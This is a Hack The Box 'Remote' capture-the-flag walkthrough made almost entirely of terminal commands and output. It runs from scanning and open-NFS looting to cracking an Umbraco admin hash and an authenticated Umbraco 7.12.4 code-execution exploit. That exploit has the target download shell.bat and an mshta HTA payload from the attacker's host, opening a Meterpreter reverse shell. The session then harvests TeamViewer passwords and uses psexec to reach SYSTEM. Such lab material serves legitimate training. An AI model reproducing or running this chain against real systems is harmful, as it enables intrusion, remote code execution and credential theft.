Remote
Sun, 15 September 2024
Platform: Hack The Box
Nmap scan report for 10.129.230.172
Host is up (0.058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 59m58s
| smb2-time:
| date: 2024-09-14T14:35:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
curl 10.129.230.172:80/people | grep '<h3 class="employee-grid__item__name">' | awk '{print $2 " " $3}'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 6739 100 6739 0 0 50960 0 --:--:-- --:--:-- --:--:-- 51053
class="employee-grid__item__name">Jan Skovgaard</h3>
class="employee-grid__item__name">Matt Brailsford</h3>
class="employee-grid__item__name">Lee Kelleher</h3>
class="employee-grid__item__name">Jeavon Leopold</h3>
class="employee-grid__item__name">Jeroen Breuer</h3>
Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer
showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
[Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 56ms]
http://remote.htb/install
| --> | /umbraco/
[Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 380ms]
http://remote.htb/umbraco
searchsploit umbraco
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------
showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
sudo mount.nfs remote.htb:site_backups -w /mnt
cd /mnt
grep -rw "username" .
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:15:24,558 [P4408/D20/T16] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:16:55,036 [P4408/D20/T41] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:36,660 [P4408/D20/T37] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:42,642 [P4408/D20/T16] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:31,767 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:38,043 [P4408/D20/T41] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:52,835 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:28:28,366 [P4408/D20/T6] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:28:54,043 [P4408/D15/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:45,046 [P4408/D18/T39] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:53,831 [P4408/D18/T6] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
Login attempt succeeded for username admin@htb.local
Login attempt succeeded for username ssmith@htb.local
Login attempt failed for username Umbracoadmin123!!
find . -type f -exec strings {} + | grep "admin"
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
find . -type f -exec strings {} + | grep "ssmith"
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' | johnx rockyou
Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
Wordlist: rockyou
Format: raw-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 512/512 AVX512BW 16x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2024-09-15 00:06) 2.631g/s 25849Kp/s 25849Kc/s 25849KC/s baconbarnett..baconand21
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
http://remote.htb/umbraco
login:
admin@htb.local:baconandcheese
Umbraco version 7.12.4
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c curl -a "10.10.16.4:8088/shell.bat -o C:/programdata/shell.bat"
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c "C:/programdata/shell.bat"
cd C:\Users\Public\Desktop>
type user.txt
e4df2964f254745b546da66ccd7d6381
Directory of C:\Users\Public\Desktop
01/09/2024 10:48 AM <DIR> .
01/09/2024 10:48 AM <DIR> ..
09/14/2024 09:23 PM 971 TeamViewer 7.lnk
09/14/2024 07:03 PM 34 user.txt
2 File(s) 1,005 bytes
2 Dir(s) 13,339,992,064 bytes free
msf6 exploit(multi/handler) > windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 10.10.16.4
srvhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > set lhost 10.10.16.4
lhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] Using URL: http://10.10.16.4:8080/jE54f2zCU.hta
[*] Server started.
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c mshta.exe -a "http://10.10.16.4:8080/jE54f2zCU.hta"
[*] Sending stage (176198 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.180:49729) at 2024-09-15 04:18:31 +0100
[*] 10.10.16.4 hta_server - Delivering Payload
msf6 exploit(windows/misc/hta_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\DefaultAppPool @ REMOTE 10.10.16.4:4444 -> 10.10.10.180:49729 (10.10.10.180)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
impacket-psexec Administrator@remote.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aDJBVBDA.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service EjrD on remote.htb.....
[*] Starting service EjrD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
cd C:\Users\Administrator\Desktop
type root.txt
031af16b2bc6d902d89dcb0602c65ee6